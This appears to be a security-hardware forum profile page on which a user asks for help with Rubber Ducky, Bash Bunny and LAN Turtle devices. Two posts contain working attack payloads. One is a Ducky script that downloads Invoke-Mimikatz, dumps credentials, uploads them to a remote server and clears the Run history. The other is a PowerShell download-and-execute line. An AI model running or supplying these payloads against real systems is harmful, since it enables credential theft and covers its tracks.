Jump to content

mule

Active Members
  • Posts

    24
  • Joined

  • Last visited

  • Days Won

    1

Recent Profile Visitors

1,057 profile views

mule's Achievements

Newbie

Newbie (1/14)

1

Community Answers

  1. Yes, in the powershell window is when I'm seeing the @ signs.
  2. This is what the rubber ducky is outputting to my CMD window: Notice that @ signs have been subbed for " marks. I've tried changing the language from GB to US, but that doesn't seem to help either powershell @IEX (New-Object Net.WebClient).DownloadString('http://someplace.com/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('https://someplace.com/rx.php', $output)@ Here's the contents of the file that I pass to ducktools (python.exe ducktools.py -e -l us mimi.txt inject1.bin) to get my inject.bin file Any help would be greatly appreciated! Mimi.txt file contents: REM Title: Invoke mimikatz and send creds to remote server REM Author: Hak5Darren Props: Mubix, Clymb3r, Gentilkiwi DELAY 1000 REM Open an admin command prompt GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 REM Obfuscate the command prompt REM STRING mode con:cols=18 lines=1 ENTER REM STRING color FE ENTER REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://someplace.com/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('https://someplace.com/rx.php', $output)" ENTER DELAY 15000 REM Clear the Run history and exit STRING powershell Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue ENTER STRING exit ENTER
  3. mule

    Violation of CoC

    I'm using 1.3 FW on my bash bunny and I'm use .2 of the Mr. Robot (MIMIKATZ) payload. However, when its run on my test machine. I get the following error. I removed the -W hidden from the powershell line, so I could see what was causing the failure. As you can see a bit further down, the 172.16.64.1 address is pingable, so I'm not really sure why I'm getting the unable to connect error or what other arguments are needed for DownloadString. Any help will be greatly appreciated! C:\Windows\System32>powershell "while ($true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p.ps1');exit}}" Exception calling "DownloadString" with "1" argument(s): "Unable to connect to the remote server" At line:1 char:59 + while ($true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.We ... + ~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : WebException C:\Windows\System32>ping 172.16.64.1 Pinging 172.16.64.1 with 32 bytes of data: Reply from 172.16.64.1: bytes=32 time<1ms TTL=64 Reply from 172.16.64.1: bytes=32 time<1ms TTL=64 Reply from 172.16.64.1: bytes=32 time<1ms TTL=64 Reply from 172.16.64.1: bytes=32 time<1ms TTL=64
  4. mule

    Creds Payload

    Thanks for the info. Just a couple of follow-up questions. 1. Is this the correct github location for responder -> https://github.com/SpiderLabs/Responder 2. Without responder loaded shouldn't the BB give me an error LED. Once I see the flash of the green LED, nothing else happens. Thanks again for your help!
  5. mule

    Creds Payload

    I've completed the firmware 1.1 update and the impacket tools installation. However, when I place the creds payload into payload.txt under the payload\switch1 directory. I get a quick green flash and nothing else. The only switch position that seems to work is zero. Any advice as to what my next step should be?
  6. mule

    LAN Turtle

    I removed the screws and factory flashed it. Now I'm able to login.
  7. mule

    LAN Turtle

    Those are the username and passwords I used. IPconfig says it sees the LAN Turtle. Ethernet adapter Ethernet 3: Connection-specific DNS Suffix . : lan Description . . . . . . . . . . . : Realtek USB FE Family Controller Physical Address. . . . . . . . . : 00-E0-4C-36-0F-FF DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes IPv6 Address. . . . . . . . . . . : fd8f:cf7a:45fa:0:159d:9f95:dc6d:bb5(Preferred) Temporary IPv6 Address. . . . . . : fd8f:cf7a:45fa:0:9445:a643:a3cc:da53(Preferred) Link-local IPv6 Address . . . . . : fe80::159d:9f95:dc6d:bb5%8(Preferred) IPv4 Address. . . . . . . . . . . : 172.16.84.127(Preferred) Subnet Mask . . . . . . . . . . . : 255.255.255.0 Lease Obtained. . . . . . . . . . : Wednesday, October 28, 2015 1:08:57 PM Lease Expires . . . . . . . . . . : Thursday, October 29, 2015 1:08:56 AM Default Gateway . . . . . . . . . : 172.16.84.1 DHCP Server . . . . . . . . . . . : 172.16.84.1 DHCPv6 IAID . . . . . . . . . . . : 302047308 DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-18-3A-B1-9D-54-04-A6-1E-F2-37 DNS Servers . . . . . . . . . . . : 172.16.84.1 NetBIOS over Tcpip. . . . . . . . : Enabled login as: root root@172.16.84.1's password: Access denied
  8. mule

    LAN Turtle

    I just got my LAN turtle today and plugged it into my USB port. SSH (using putty) to it on 172.16.84.1, got the SSH key trust,typed root for the password and the default password from the Wiki page (http://lanturtle.com/wiki/#!index.md#Connecting_for_the_first_time) but given the error access denied. Any help would be appreciated. Something tells me that the Wiki page password might be out of date. Thanks, Mule
×
×
  • Create New...